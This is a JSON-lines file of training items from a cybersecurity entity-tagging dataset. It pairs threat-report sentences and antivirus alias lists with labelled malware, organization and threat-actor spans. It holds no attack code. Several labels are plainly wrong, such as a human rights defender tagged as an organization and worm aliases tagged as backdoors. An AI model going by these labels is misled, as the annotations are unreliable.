{"text": "A backdoor also known as: Trojan-Downloader.Mediket.CD Troj.Downloader.W32.Mediket.cd!c Trojan/Downloader.Mediket.cd Win32.Trojan.WisdomEyes.16070401.9500.9810 W32/Downloader.JJGI-8097 Win32/SillyDl.FL Trojan-Downloader.Win32.Mediket.cd Trojan.Win32.Mediket.dkal Trojan.Win32.Downloader.10240.ES Trojan.DownLoader.7470 Downloader.Mediket.Win32.64 Trojan-Downloader.Win32.Mediket.bl W32/DldrX.DHK TrojanDownloader.Mediket.fv TR/Dldr.Mediket.S.2 Trojan[Downloader]/Win32.Mediket Trojan.Heur.amGfYI3rB7li Trojan-Downloader.Win32.Mediket.cd Trojan/Win32.Small.C140121 Trojan-Downloader.Win32.Mediket.ca Trojan-Downloader.Mediket.CD Win32.Trojan-downloader.Mediket.Ajvz W32/Dloader.CD!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004516", "source": "cyner2_train"}}
{"text": "A particular focus appears to have been placed on the healthcare industry.", "spans": {}, "info": {"id": "cyner2_train_004517", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Small.6656.AAX Trojan.Win32.Small!O Trojan.Tosct Trojan.Heur.RP.EF49A0 TROJ_DLOADER.FAV Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.MPRY-6149 TROJ_DLOADER.FAV Trojan.Win32.Small.coy Trojan.Win32.Small.cwxndz Trojan.Click2.56220 Trojan.Small.Win32.19363 Trojan.Win32.Tosct Trojan/Small.ovb TR/Spy.6656.106 Trojan/Win32.Small Win32.Troj.Undef.kcloud Trojan.Win32.Small.coy Trojan:Win32/Tosct.A Trojan/Win32.Connapts.C256364 Trojan.Small.coy Trojan.Small Win32.Trojan.Small.Aiik Trojan.Small!nYMaRKVOefk W32/Dloader.FAV!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004518", "source": "cyner2_train"}}
{"text": "In these websites they hosted malware that was digitally signed with a valid, likely stolen code signing certificate", "spans": {"MALWARE: malware": [[30, 37]], "MALWARE: stolen code": [[85, 96]]}, "info": {"id": "cyner2_train_004519", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Hybris.B@mm Email-Worm.Win32.Hybris!O Worm.Hybris W32/Hybris.dll@MM W95.Hybris.PI.msOW W32/Hybris.dll@MM WORM_HYBRIS.F Win32.Trojan.WisdomEyes.16070401.9500.9989 W32/Hybris.worm.B W95.Hybris.worm WORM_HYBRIS.F Win.Trojan.Hybris-10 Win32.Hybris.B@mm Email-Worm.Win32.Hybris.plugin Win32.Hybris.B@mm Trojan.Win32.Hybris.upukw Win32.Hybris Win32.Hybris.B@mm EmailWorm.Win32.Hybris.lki Win98.Vecna.23040 Worm.Hybris.Win32.8 BehavesLike.Win32.Virut.pm W32/Hybris.worm.B Worm/Hybris.c Worm[Email]/Win32.Hybris Worm:Win32/Hybris.C@mm Email-Worm.Win32.Hybris.plugin I-Worm/Hybris.Variant Win32.Hybris.B@mm W32/Hybris.Wsock Win32.Hybris.E2C45E Win32/Hybris.dll Win32.Worm-email.Hybris.Wuqu I-Worm.Hybris Email-Worm.Win32.Hybris.Based W32/Hybris.dll@mm Win32/Worm.Email-Worm.47d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004520", "source": "cyner2_train"}}
{"text": "Who is behind Judy ? The malicious apps are all developed by a Korean company named Kiniwini , registered on Google Play as ENISTUDIO corp .", "spans": {"MALWARE: Judy": [[14, 18]], "ORGANIZATION: Kiniwini": [[84, 92]], "SYSTEM: Google Play": [[109, 120]], "ORGANIZATION: ENISTUDIO corp": [[124, 138]]}, "info": {"id": "cyner2_train_004521", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.8BE3 Win32.Neveg.C@mm Worm/W32.Neveg.52294.B W32/Neveg.c@MM W32/Neveg.c Win32.Neveg.C@mm Trojan.Win32.Neveg.iclu W32/Neveg.D@mm W32.Neveg.C@mm Win32/Neveg.C WORM_NEVEG.C Worm.Neveg.C.4 Email-Worm.Win32.Neveg.c I-Worm.Neveg!ysm95GgJE50 I-Worm.Win32.Neveg.52294.C[h] W32.W.Neveg.c!c Win32.Neveg.C@mm Worm.Win32.Neveg.C Win32.Neveg.C@mm Win32.HLLM.Peerage Worm.Neveg.Win32.1 WORM_NEVEG.C BehavesLike.Win32.Ramnit.qc W32/Neveg.URKR-8484 Worm[Email]/Win32.Neveg Win32.Neveg.EB4884 Worm/Win32.MyDoom Worm:Win32/Neveng.C@mm Win32.Neveg.C@mm Worm.Neveg W32/Neveg.D.worm Win32.Worm-email.Neveg.Lpbl Email-Worm.Win32.Neveg.C Win32.Neveg.C@mm I-Worm/Neveg.C Worm.Win32.Neveg.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004522", "source": "cyner2_train"}}
{"text": "Ahmed Mansoor is an internationally recognized human rights defender, based in the United Arab Emirates UAE, and recipient of the Martin Ennals Award sometimes referred to as a Nobel Prize for human rights .", "spans": {"ORGANIZATION: Ahmed Mansoor": [[0, 13]], "ORGANIZATION: human rights defender,": [[47, 69]]}, "info": {"id": "cyner2_train_004524", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Trojan.MOBS-7437 Win.Trojan.B-474 Virus.Win32.Virut.CE Trojan.Heur.LP.EE1B95 Backdoor:Win32/Liudoor.B!dha Backdoor/Win32.Liudoor.R192527 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004527", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDropper.Dorkbot.II4 Backdoor.Bifrose.Win32.18816 Backdoor.Bifrose Trojan/Midgare.advf TROJ_DROPPER.SMS Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Dropper Win32/Bifrose.KJ TROJ_DROPPER.SMS Win.Trojan.Bifrose-9522 Trojan.Win32.Midgare.bqxuse BackDoor.Bifrost.26217 BehavesLike.Win32.Downloader.kc Backdoor/Bifrose.ovy TR/Midgare.adjf Trojan[Backdoor]/Win32.Bifrose Win32.Hack.MnlessT.lo.88519 TrojanDropper:Win32/Dooxud.A Trojan.Graftor.D46F7 Backdoor.Win32.Bifrose.77824.N Trojan/Win32.Bifrose.R3685 Backdoor.Bifrose VirTool.Injector!nUBzjCDRby4 Trojan.Win32.Midgare", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004528", "source": "cyner2_train"}}
{"text": "Proofpoint researchers originally discovered the Panda Banker malware in February, 2016.", "spans": {"ORGANIZATION: Proofpoint researchers": [[0, 22]], "MALWARE: the Panda Banker malware": [[45, 69]]}, "info": {"id": "cyner2_train_004529", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9961 Trojan.Win32.Bladabindi.esnxij Trojan.Win32.Z.Bladabindi.116224.CW Worm.MSIL.Autorun Trojan.MSIL.Bladabindi.1 TrojanDownloader:MSIL/Prardrukat.A Trj/GdSda.A Win32.Trojan.Atraps.Taew Win32/Trojan.62b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004530", "source": "cyner2_train"}}
{"text": "Beginning on October 30, 2015, Palo Alto Networks began seeing instances of this new version of CryptoWall, which some researchers have begun calling version 4.", "spans": {"ORGANIZATION: Palo Alto Networks": [[31, 49]], "MALWARE: CryptoWall,": [[96, 107]], "ORGANIZATION: researchers": [[119, 130]], "MALWARE: version 4.": [[150, 160]]}, "info": {"id": "cyner2_train_004531", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FakeFolderDAS.Trojan Backdoor.Win32.BlackHole!O Worm.RussoTuristo Worm.RussoTuristo.Win32.83 Trojan.Heur.E54A1B Win32/Russo.A Worm.Win32.RussoTuristo.f Trojan.Win32.Amorale.crsxml Worm.Win32.RussoTuristo.53326 Trojan.Win32.FakeFolder.pb Win32.HLLW.Amorale BehavesLike.Win32.Adware.qh Backdoor/Blackhole.bmv Worm/Win32.RussoTuristo Worm.Win32.RussoTuristo.f Worm/Win32.RussoTuristo.R58000 Worm.TycKa.K Worm.Win32.RussoTuristo Worm.Win32.FakeFolder.CI", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004533", "source": "cyner2_train"}}
{"text": "In the past weeks on 6 August 2016, Cyberkov Security Incident Response Team CSIRT received a numerous Android malwares operating in different areas in Libya especially in Tripoli and Benghazi.", "spans": {"ORGANIZATION: Cyberkov Security Incident Response Team CSIRT": [[36, 82]], "MALWARE: Android malwares": [[103, 119]]}, "info": {"id": "cyner2_train_004534", "source": "cyner2_train"}}
{"text": "Since January 2016, discreet campaigns involving malware called Trojan.Odinaff have targeted a number of financial organizations worldwide.", "spans": {"THREAT_ACTOR: campaigns": [[29, 38]], "MALWARE: malware called": [[49, 63]], "ORGANIZATION: financial organizations worldwide.": [[105, 139]]}, "info": {"id": "cyner2_train_004535", "source": "cyner2_train"}}
{"text": "The campaign Talos analysed focused on Brazilian users and also attempted to remain stealthy by using multiple methods of re-direction in an attempt to infect the victim machine.", "spans": {"THREAT_ACTOR: The campaign": [[0, 12]], "ORGANIZATION: Talos": [[13, 18]], "ORGANIZATION: Brazilian users": [[39, 54]], "SYSTEM: the victim machine.": [[159, 178]]}, "info": {"id": "cyner2_train_004536", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Syamcrog Trojan.Ursu.D1107 Win.Trojan.Bifrose-10939 Trojan.Win32.Tiny.etjahi TR/Downloader.wgueo Trojan:Win32/Syamcrog.A Trojan.Refroso Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004537", "source": "cyner2_train"}}
{"text": "Unfortunately, the ransomware developers were not apprehended and it now appears they have been biding their time before releasing a new ransomware.", "spans": {"THREAT_ACTOR: ransomware developers": [[19, 40]], "MALWARE: ransomware.": [[137, 148]]}, "info": {"id": "cyner2_train_004538", "source": "cyner2_train"}}
{"text": "Meanwhile, we have informed the Google Play security team about the RetroTetris app and are awaiting their response.", "spans": {"ORGANIZATION: Google Play security team": [[32, 57]], "MALWARE: RetroTetris app": [[68, 83]]}, "info": {"id": "cyner2_train_004540", "source": "cyner2_train"}}
{"text": "Adobe released a patch for the vulnerability on July 8, 2015.", "spans": {"ORGANIZATION: Adobe": [[0, 5]], "VULNERABILITY: vulnerability": [[31, 44]]}, "info": {"id": "cyner2_train_004541", "source": "cyner2_train"}}
{"text": "The malware payloads observed to be associated with the Uyghur themed C2 domains so far consist of PlugX, Gh0st RAT, and Saker/Xbox, although there may be others that are yet to be discovered.", "spans": {"MALWARE: The malware payloads": [[0, 20]], "ORGANIZATION: Uyghur": [[56, 62]], "MALWARE: PlugX, Gh0st RAT,": [[99, 116]], "MALWARE: Saker/Xbox,": [[121, 132]]}, "info": {"id": "cyner2_train_004543", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BackDoor.RevetRat.2 BehavesLike.Win32.Trojan.cc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004546", "source": "cyner2_train"}}
{"text": "Not only that, but the Windows version was additionally equipped with a valid code signing signature.", "spans": {"SYSTEM: Windows version": [[23, 38]]}, "info": {"id": "cyner2_train_004547", "source": "cyner2_train"}}
{"text": "This was followed by another great blog by McAfee on the same subject but my focus will be on a specific aspect mentioned in the RSA blog which is the exploit used. FireEye discovered a malicious docx exploiting a zero day vulnerability in Microsoft's Encapsulated Postscript EPS filter, in the summer of 2015.", "spans": {"ORGANIZATION: McAfee": [[43, 49]], "ORGANIZATION: RSA": [[129, 132]], "MALWARE: exploit": [[151, 158]], "ORGANIZATION: FireEye": [[165, 172]], "VULNERABILITY: exploiting a zero day vulnerability": [[201, 236]]}, "info": {"id": "cyner2_train_004548", "source": "cyner2_train"}}
{"text": "The first trace of this tool in our telemetry data dates back to late 2015.", "spans": {"MALWARE: tool": [[24, 28]], "SYSTEM: telemetry data": [[36, 50]]}, "info": {"id": "cyner2_train_004553", "source": "cyner2_train"}}
{"text": "This report is a comprehensive description of the JSocket Remote Access Tool RAT, and its significant capability to control PCs, Linux machines, Macs and Android devices.", "spans": {"MALWARE: JSocket Remote Access Tool RAT,": [[50, 81]], "SYSTEM: Linux machines, Macs": [[129, 149]], "SYSTEM: Android devices.": [[154, 170]]}, "info": {"id": "cyner2_train_004554", "source": "cyner2_train"}}
{"text": "Earlier this month, FortiGuard Labs researchers published findings about a malware campaign exploiting a PowerPoint vulnerability.", "spans": {"ORGANIZATION: FortiGuard Labs researchers": [[20, 47]], "THREAT_ACTOR: malware campaign": [[75, 91]], "VULNERABILITY: exploiting a PowerPoint vulnerability.": [[92, 130]]}, "info": {"id": "cyner2_train_004555", "source": "cyner2_train"}}
{"text": "While the cyber-world was still shaking under the destructive ExPetr/Petya attack that hit on June 27, another ransomware attack targeting Ukraine at the same time went almost unnoticed.", "spans": {"THREAT_ACTOR: cyber-world": [[10, 21]], "MALWARE: ExPetr/Petya": [[62, 74]]}, "info": {"id": "cyner2_train_004556", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Johnnie.DB3AF Trojan.Win32.Clicker!BT W32/Trojan.IUSC-1586 TrojanClicker:MSIL/Youclick.A Trojan.Win32.Clicker!BT Trojan-Clicker.MSIL.Youclick", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004558", "source": "cyner2_train"}}
{"text": "Recently, while researching attacks on targets in Thailand, Unit 42 discovered a tool that initially appeared to be a variant of the well-known PlugX RAT based on similar observed behavior such as the usage of DLL side-loading and a shellcode file.", "spans": {"ORGANIZATION: Unit 42": [[60, 67]], "MALWARE: tool": [[81, 85]], "MALWARE: variant": [[118, 125]], "MALWARE: PlugX RAT": [[144, 153]]}, "info": {"id": "cyner2_train_004560", "source": "cyner2_train"}}
{"text": "YOUR PERSONAL ID: Personal ID of your computer, for example: 4df7065b1d049d098526344faaabf3f8", "spans": {}, "info": {"id": "cyner2_train_004562", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Sality.lak4 Trojan.Heur.EFE584 Win32.Trojan.WisdomEyes.16070401.9500.9961 Backdoor.Trojan Trojan-PSW.Win32.LdPinch.zie Trojan.DownLoader.origin BehavesLike.Win32.Virut.nt Trojan-PSW.Win32.LdPinch.zie", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004564", "source": "cyner2_train"}}
{"text": "The international investigation into the 2014 Iguala Mass Disappearance was targeted with infection attempts using spyware developed by the NSO group, an Israeli cyber warfare company", "spans": {"ORGANIZATION: Iguala Mass": [[46, 57]], "MALWARE: spyware": [[115, 122]], "ORGANIZATION: the NSO group,": [[136, 150]], "ORGANIZATION: Israeli cyber warfare": [[154, 175]]}, "info": {"id": "cyner2_train_004567", "source": "cyner2_train"}}
{"text": "In recent attacks they set up a fake VPN Web Portal and targeted at least five Israeli IT vendors, several financial institutes, and the Israeli Post Office.", "spans": {"ORGANIZATION: IT vendors,": [[87, 98]], "ORGANIZATION: financial institutes,": [[107, 128]], "ORGANIZATION: Israeli Post Office.": [[137, 157]]}, "info": {"id": "cyner2_train_004568", "source": "cyner2_train"}}
{"text": "A backdoor also known as: VB:Trojan.VBA.Downloader.BU X97M.Petya.A VB:Trojan.VBA.Downloader.BU X2KM_GOLDENEYE.B Xls.Dropper.Goldeneye-3 VB:Trojan.VBA.Downloader.BU Trojan.Script.DnlrObj.ejzqyq Troj.Downloader.Script!c VB:Trojan.VBA.Downloader.BU VB:Trojan.VBA.Downloader.BU X2KM_GOLDENEYE.B X97M/Downloader.au VB:Trojan.VBA.Downloader.BU Trojan:O97M/Goldeneye.A X97M/Downloader.au Trojan-Ransom.VBA.GoldenEye Macro.Trojan-Dropper.Petya.R O97M/Dropper.ALI virus.office.obfuscated.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004569", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.Haed!O Trojan/Dropper.Haed.co TROJ_DROP.SMUS1 W32/Dropper.BJGT Backdoor.Trojan TROJ_DROP.SMUS1 Win.Trojan.Haed-1 Trojan-Dropper.Win32.Haed.eno Trojan.Win32.Drop.mqlso Troj.Dropper.W32.Haed.eno!c TrojWare.Win32.Kryptik.BAN Trojan.Click1.57099 Dropper.Haed.Win32.381 virus.win32.ramnit.j W32/Risk.OLFU-0240 TR/Drop.He4Hook.B W32/Haed.A!tr.dldr Trojan[Dropper]/Win32.Haed Trojan.Heur.JP.E9E07C Dropper/Win32.Haed.N349364692 AdWare.AdPlus Win32.Trojan-Dropper.Haed.cfsr Trojan-Downloader.Win32.Frethog", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004571", "source": "cyner2_train"}}
{"text": "In recent months, the malware used in the EITest campaign has been ransomware such as Spora and Mole.", "spans": {"MALWARE: the malware": [[18, 29]], "THREAT_ACTOR: the EITest campaign": [[38, 57]], "MALWARE: ransomware": [[67, 77]], "MALWARE: Spora": [[86, 91]], "MALWARE: Mole.": [[96, 101]]}, "info": {"id": "cyner2_train_004576", "source": "cyner2_train"}}
{"text": "Example note:Please follow the instructions Send $300 worth of Bitcoin to following address: 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX", "spans": {}, "info": {"id": "cyner2_train_004577", "source": "cyner2_train"}}
{"text": "This specific APK was modified to include the malicious remote access tool RAT called DroidJack also known as SandroRAT, which would virtually give an attacker full control over a victim's phone.", "spans": {"SYSTEM: APK": [[14, 17]], "MALWARE: malicious remote access tool RAT called DroidJack": [[46, 95]], "MALWARE: SandroRAT,": [[110, 120]], "THREAT_ACTOR: attacker": [[151, 159]], "ORGANIZATION: victim's phone.": [[180, 195]]}, "info": {"id": "cyner2_train_004578", "source": "cyner2_train"}}
{"text": "While performing some research online, Unit 42 was able to identify the following sample, which is being labeled as Trojan.Win32.Seadask' by a number of anti-virus companies.", "spans": {"ORGANIZATION: Unit 42": [[39, 46]], "ORGANIZATION: anti-virus companies.": [[153, 174]]}, "info": {"id": "cyner2_train_004579", "source": "cyner2_train"}}
{"text": "Truth be told, these are all likely just improvements by the author to fix bugs or simply a shift in approach to make signature matching more difficult rather then a completely new variant.", "spans": {}, "info": {"id": "cyner2_train_004580", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TROJ_INJECT.YYTS Win32.Trojan.WisdomEyes.16070401.9500.9953 Infostealer.Limitail TROJ_INJECT.YYTS Trojan.Win32.Inject.dkhjux Trojan/Scarsi.uz W32.Tepfer.Uqxl TR/MailPassStlr.A.87 Trojan[Dropper]/Win32.FrauDrop Trojan:MSIL/Limitless.A Trojan/Win32.DarkKomet.C641651 TrojanDropper.Injector Trj/CI.A Trojan.Injector!yje4mrhO7hs", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004581", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exploit.SWF.CVE-2012-0754.B Exploit/W32.CVE-2012-0754 Exp.SWF.CVE-2012-0754 Exploit.CVE-2012-0754 Exploit.SWF.CVE-2012-0754.a!c Trojan.Mdropper SWF/Exploit.CVE-2012-0754.A SWF_EXPLCVE.A Exploit.SWF.CVE-2012-0754.B Exploit.SWF.CVE-2012-0754.a Exploit.SWF.CVE-2012-0754.B Exploit.S.D-Encrypted.106604 Exploit.SWF.CVE-2012-0754.B Exploit.SWF.CVE-2012-0754.B Exploit.CVE-2012-0754.1 SWF_EXPLCVE.A Exploit-MSWord.o DOC/SWFDropper.A!Camelot TrojanDownloader.SWF.t Trojan[Exploit]/SWF.CVE-2012-0754.a Exploit:Win32/CVE-2012-0754.A Exploit.SWF.CVE-2012-0754.B Exploit.SWF.CVE-2012-0754.a Exploit-MSWord.o Exploit.SWF.CVE-2012-0754.a Win32.Exploit.Cve-2012-0754.Ajli Exploit.CVE-2012-0754.A Exploit.SWF.CVE-2012-0754 W32/SWFExp.AS!tr Win32/Trojan.Exploit.6a5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004582", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.BHO!O TrojanDownloader.Gamup Trojan/BHO.obt Trojan.Zusy.D42D95 TROJ_STARTP.SML2 Win32.Trojan.BHO.n TROJ_STARTP.SML2 Win.Trojan.OnlineGames-65 Trojan-Downloader.Win32.Gamup.qjl Trojan.Win32.Gamup.ciurh Trojan.Win32.A.Downloader.409816[UPX] Troj.Downloader.W32.Gamup!c Trojan.DownLoad2.34122 Downloader.Gamup.Win32.146 BehavesLike.Win32.Backdoor.cc Trojan.Win32.StartPage TR/BHO.efkmnb Trojan[Downloader]/Win32.Gamup Trojan-Downloader.Win32.Gamup.qjl TrojanDownloader.Gamup Win32.Trojan-downloader.Gamup.Ebhc Win32/Trojan.f4f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004583", "source": "cyner2_train"}}
{"text": "During the past few weeks there has been an increase in malvertising attacks, for example via a series of compromises of open source Revive ad servers which is still continuing.", "spans": {"SYSTEM: open source Revive ad servers": [[121, 150]]}, "info": {"id": "cyner2_train_004584", "source": "cyner2_train"}}
{"text": "Utilizing AutoIT within a payload is unique because it is a legitimate management tool.", "spans": {"MALWARE: AutoIT": [[10, 16]], "MALWARE: payload": [[26, 33]], "SYSTEM: legitimate management tool.": [[60, 87]]}, "info": {"id": "cyner2_train_004586", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Batman.B Trojan/W32.Batman.24576 Trojan.Batman.B Trojan/Batman.b Trojan.Batman.B W32.BatmanTroj Win32/Batman.B TROJ_BATMAN.B Dos.Trojan.an-1 Trojan.Win32.Batman.b Trojan.Win32.Batman.dcuw Trojan.Win32.S.Batman.24576[h] Win32.Trojan.Batman.Efkt Trojan.Batman.B TrojWare.Win32.Batman.B0 Trojan.Batman.B Trojan.Batman.24576 Trojan.Batman.Win32.2 TROJ_BATMAN.B W32/Trojan.DVOK-6663 Trojan/Win32.Batman.b TR/Batman.B W32/Batman.B!tr Trojan/Win32.Batman Trojan.Batman.B Troj.W32.Batman.b!c Trojan:Win32/Batman.B Trojan/Win32.Batman.N15760 Trojan.Batman Trojan.Batman!bY5LWYbvsHM Trojan.Win32.Batman Trojan.Batman.B Trj/Batman.B Win32/Trojan.022", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004587", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 TrojWare.MSIL.Injector.AOX BackDoor.Blackshades.2 Trojan/Foreign.axc Trojan[Ransom]/Win32.Foreign Trojan:MSIL/Parpwuts.C Win32/Trojan.74b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004588", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.Daws!O TrojanDropper.Daws Win32.Worm.VB.sk W32.SillyFDC Trojan-Dropper.Win32.Daws.bkbb Trojan.Win32.Daws.dwunho Trojan.MulDrop4.55506 Dropper.Daws.Win32.11917 BehavesLike.Win32.VBObfus.vz Win32/Virut.bv Trojan[Dropper]/Win32.Daws TrojanDropper:Win32/Vimdop.A!bit Trojan.Razy.D1F32 Trojan-Dropper.Win32.Daws.bkbb Dropper/Win32.Daws.R88727 TScope.Trojan.VB Win32.Trojan-dropper.Daws.Wsug Trojan.DR.Daws!i7I48rjdKf8 Trojan.VB2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004589", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-PWS/W32.WebGame.66136.T Trojan-GameThief.Win32.OnLineGames!O PWS.Zhengtu.BB3 Trojan/OnLineGames.ajcfn Trojan.Zusy.D2717 Win32.Trojan-PSW.OLGames.cm Infostealer.Onlinegame Win.Trojan.Onlinegames-14906 Trojan.Win32.OnLineGames.vtdwn Troj.GameThief.W32.OnLineGames.lulb TrojWare.Win32.GameThief.Magania.~NWABZ Trojan.PWS.Wsgame.34942 Trojan.OnLineGames.Win32.120767 BehavesLike.Win32.Vundo.kh Heur:Trojan/PSW.OnLineGames Trojan[GameThief]/Win32.OnLineGames PWS:Win32/Zhengtu.B!dll Trojan/Win32.OnlineGameHack.R23439 PWS-OnlineGames.ld TrojanPSW.OnLineGames.ai Trojan.Win32.OnlineGames.zt Trojan.PWS.OnLineGames!atUPCfHrrdw Trojan-Spy.OnLineGames W32/Onlinegames.WXA!tr Trojan.PSW.Win32.GameOnline.EN", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004590", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Crypt.Delf.E Trojan.Crypt.Delf.E Trojan/Downloader.Dadobra.as Trojan.Crypt.Delf.E Trojan.DL.Dadobra!9AHkQxAvV1E W32/Bancos.APF Downloader.Trojan TSPY_BANKER.UV Trojan-Downloader.Win32.Dadobra.af Trojan.Crypt.Delf.E Trojan.Win32.Dadobra.cmicp Trojan.Win32.Downloader.375808.K[h] Trojan.Crypt.Delf.E Trojan.Crypt.Delf.E Trojan.DownLoader.2321 Downloader.Dadobra.Win32.410 TSPY_BANKER.UV TrojanDownloader.Dadobra.as Trojan[Downloader]/Win32.Dadobra TrojanDownloader:Win32/Dadobra.BM Troj.Downloader.W32.Dadobra.as!c Trojan/Win32.Dadobra Trojan.Crypt.Delf.E Trojan.Win32.Dadobra.af Trojan-Dropper.Delf W32/Delf.DOA!tr.dldr PSW.Banker.33.BG", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004592", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.VariantNetvat.Trojan Trojan.Netvat Backdoor.Trojan Trojan.Win32.Netvat.45056 Worm.Win32.Tenavt.A Trojan.DownLoader11.42361 BehavesLike.Win32.Downloader.pt W32/Trojan.SSPB-9075 Trojan:Win32/Netvat.E!Dll Trojan.Graftor.D29A7D Trojan/Win32.Menti.R124411 Win32.Trojan.Dropper.Heur Worm.Tenavt!JDujK3yXihg W32/Kryptik.DTAI!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004593", "source": "cyner2_train"}}
{"text": "However it's important to say that these attackers, and the toolset used, share a number of similarities with the BlackEnergy group, which conducted attacks against the energy industry in Ukraine in December 2015 and January 2016.", "spans": {"THREAT_ACTOR: attackers,": [[41, 51]], "MALWARE: toolset": [[60, 67]], "THREAT_ACTOR: BlackEnergy group,": [[114, 132]]}, "info": {"id": "cyner2_train_004595", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9906 Trojan.Win32.PeaceDuke.gfb Trojan.Win32.Z.Peaceduke.3126830 Win32.Trojan.Peaceduke.Taow BehavesLike.Win32.Worm.vc TR/PeaceDuke.wuwtd Backdoor:Win32/Cozer.A!dha Trojan.Win32.PeaceDuke.gfb Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004596", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32/RiskWare.PEMalform.E W32.W.Otwycal.l4av Tool.YahooCrack HackTool.YahoCrack.21 HackTool:Win32/Yacra.2_1 HackTool.Win32.Yacra", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004598", "source": "cyner2_train"}}
{"text": "The Trojan encrypts files on the compromised computer and adds the following prefix before file names: ISHTAR-", "spans": {"MALWARE: Trojan": [[4, 10]], "SYSTEM: compromised computer": [[33, 53]]}, "info": {"id": "cyner2_train_004600", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Nethief.XP Backdoor/W32.Nethief.78611 Backdoor.Win32.Nethief!O Backdoor/Nethief.XP.a Win32.Trojan.WisdomEyes.16070401.9500.9612 W32/Nethief.K@bd Backdoor.Trojan Win32/Nethief.XP.A.Server BKDR_NETHIEFXP.A Backdoor.Nethief.XP Backdoor.Win32.Nethief.ek Backdoor.Nethief.XP Trojan.Win32.Nethief.dknn Backdoor.Win32.A.Nethief.78611[UPX] Win32.Backdoor.Nethief.Aiim Backdoor.Nethief.XP Backdoor.Win32.Nethief.XP.Server Backdoor.Nethief.XP BackDoor.NethiefXP Backdoor.Nethief.Win32.139 BKDR_NETHIEFXP.A BehavesLike.Win32.Virut.lc W32/Nethief.HBZO-6955 Backdoor/Nethief.XP BDS/Nethief.XP.A Trojan[Backdoor]/Win32.Nethief Win32.Hack.Nethief.XP.kcloud Backdoor.Nethief.XP Backdoor.W32.Nethief!c Backdoor.Win32.Nethief.ek Backdoor:Win32/NetThief_XP.B Trojan/Win32.HDC.C762 Backdoor.Nethief.XP Backdoor.Nethief Backdoor.Nethief!0mFzAwzISB0 Backdoor.Win32.Ceckno W32/Nethief.EK!tr.bdr Win32/Backdoor.048", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004602", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.MSIL Dropper/Win32.Injector", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004605", "source": "cyner2_train"}}
